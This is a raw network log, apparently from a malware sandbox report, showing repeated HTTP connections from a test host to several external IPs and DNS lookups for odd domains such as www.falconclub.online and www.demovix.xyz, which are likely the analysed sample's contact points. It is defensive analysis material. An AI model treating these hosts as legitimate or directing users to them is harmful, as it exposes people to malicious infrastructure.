                                                                                                                                                                                                              Oct 8, 2024 15:36:21.802536011 CEST806084984.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.816292048 CEST6085080192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.822418928 CEST806085084.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.822539091 CEST6085080192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.838145971 CEST6085080192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.843208075 CEST806085084.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.843230009 CEST806085084.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:23.290839911 CEST806085084.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:23.290926933 CEST6085080192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:24.343944073 CEST6085080192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:24.596533060 CEST806085084.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.363372087 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.368577957 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.368669987 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.378170967 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.383198977 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860763073 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860809088 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860832930 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860857010 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860876083 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860898972 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860920906 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860953093 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860975981 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861382008 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861398935 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861428976 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861437082 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861457109 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861470938 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861501932 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.865669966 CEST6085180192.168.2.984.32.84.32
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.870784044 CEST806085184.32.84.32192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.348639965 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.353745937 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.353840113 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.364955902 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.369998932 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833496094 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833519936 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833544016 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833554983 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833578110 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833597898 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833610058 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833623886 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833632946 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833647966 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833668947 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833674908 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833689928 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833697081 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833734989 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.834307909 CEST80608523.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.834357023 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:32.875370026 CEST6085280192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.893872023 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.899036884 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.899189949 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.909727097 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:33.914827108 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378201962 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378263950 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378325939 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378357887 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378415108 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378459930 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378465891 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378513098 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378555059 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378559113 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378607035 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378647089 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378653049 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378703117 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378748894 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.378997087 CEST80608533.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:34.379062891 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:35.422138929 CEST6085380192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.441040039 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.446815014 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.446923971 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.457803011 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.462882042 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.463901043 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958839893 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958864927 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958897114 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958915949 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958930016 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958949089 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958949089 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958982944 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958991051 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.958998919 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959006071 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959029913 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959044933 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959076881 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959105968 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960849047 CEST80608543.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960908890 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:37.981678009 CEST6085480192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.988013983 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.993015051 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:38.993113995 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.000379086 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.005965948 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447664976 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447699070 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447715044 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447725058 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447745085 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447755098 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447772026 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447787046 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447798967 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447874069 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.447890997 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448275089 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448286057 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448307991 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448319912 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.448349953 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.452857018 CEST6085580192.168.2.93.91.127.116
                                                                                                                                                                                                              Oct 8, 2024 15:36:39.458149910 CEST80608553.91.127.116192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.593692064 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.598747969 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.598851919 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.609220028 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.614177942 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350007057 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350052118 CEST8060856195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:45.350125074 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:46.125463963 CEST6085680192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.145809889 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.150901079 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.151238918 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.166169882 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.171329975 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.871860981 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.872256994 CEST8060857195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.872320890 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:48.672323942 CEST6085780192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.692178965 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.697278023 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.697376966 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.712145090 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.717428923 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:49.717453003 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:50.434241056 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:50.434354067 CEST8060858195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:50.434708118 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:51.218998909 CEST6085880192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.240621090 CEST6085980192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.246011972 CEST8060859195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.246088028 CEST6085980192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.255220890 CEST6085980192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.260195017 CEST8060859195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.997530937 CEST8060859195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.998603106 CEST8060859195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:52.998866081 CEST6085980192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:53.001317978 CEST6085980192.168.2.9195.161.68.8
                                                                                                                                                                                                              Oct 8, 2024 15:36:53.007069111 CEST8060859195.161.68.8192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.110794067 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.116377115 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.116460085 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.129393101 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.134357929 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822611094 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822639942 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822663069 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822674036 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822746992 CEST8060860194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.822777033 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.828389883 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:36:59.640876055 CEST6086080192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.659971952 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.664948940 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.665044069 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.675344944 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:00.680382013 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358906031 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358947039 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358963013 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358984947 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359042883 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359060049 CEST8060861194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359075069 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.359095097 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:02.187890053 CEST6086180192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.206935883 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.212194920 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.212335110 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.223001003 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.227977991 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.228914976 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925353050 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925373077 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925398111 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925409079 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925498009 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925537109 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925544977 CEST8060862194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.927361012 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:04.757700920 CEST6086280192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.769387007 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.774384975 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.774467945 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.782306910 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.787086964 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472611904 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472735882 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472752094 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472765923 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472784042 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472804070 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472816944 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472836018 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473050117 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473050117 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473220110 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473464012 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473776102 CEST8060863194.58.112.174192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473912001 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.479140043 CEST6086380192.168.2.9194.58.112.174
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.484092951 CEST8060863194.58.112.174192.168.2.9

                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Oct 8, 2024 15:33:31.960488081 CEST5350796162.159.36.2192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:32.431962013 CEST5104353192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:33:32.439408064 CEST53510431.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.184190035 CEST5992653192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.209781885 CEST53599261.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.864052057 CEST5846153192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.895015001 CEST53584611.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.441562891 CEST5782653192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.455951929 CEST53578261.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.582298040 CEST4938653192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.601962090 CEST53493861.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:33.659929991 CEST5860553192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:34:34.470103979 CEST53586051.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.520024061 CEST5278853192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.533149004 CEST53527881.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:06.707832098 CEST5585253192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:35:06.743119955 CEST53558521.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.395275116 CEST5888853192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.736262083 CEST53588881.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:35:34.817804098 CEST5224253192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:35:35.358998060 CEST53522421.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:09.411092043 CEST6125153192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:36:09.426366091 CEST53612511.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.677227974 CEST6055653192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.723215103 CEST53605561.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:30.883127928 CEST6344353192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.345695972 CEST53634431.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.457973957 CEST5007353192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:36:44.576714993 CEST53500731.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.020536900 CEST6546353192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:36:58.107594967 CEST53654631.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.488759995 CEST5612953192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:37:12.500932932 CEST53561291.1.1.1192.168.2.9
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.007184029 CEST5878453192.168.2.91.1.1.1
                                                                                                                                                                                                              Oct 8, 2024 15:37:26.603116035 CEST53587841.1.1.1192.168.2.9

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Oct 8, 2024 15:33:32.431962013 CEST192.168.2.91.1.1.10xa920Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:36.184190035 CEST192.168.2.91.1.1.10xb2e9Standard query (0)www.multileveltravel.worldA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:33:52.864052057 CEST192.168.2.91.1.1.10x22bcStandard query (0)www.falconclub.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:06.441562891 CEST192.168.2.91.1.1.10x22f8Standard query (0)www.promasterev.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:19.582298040 CEST192.168.2.91.1.1.10xc611Standard query (0)www.childlesscatlady.todayA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:33.659929991 CEST192.168.2.91.1.1.10x99e7Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:34:48.520024061 CEST192.168.2.91.1.1.10x46b8Standard query (0)www.doggieradio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:35:06.707832098 CEST192.168.2.91.1.1.10x90daStandard query (0)www.demovix.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Oct 8, 2024 15:35:20.395275116 CEST192.168.2.91.1.1.10xaf9aStandard query (0)www.palcoconnector.netA (IP address)IN (0x0001)false
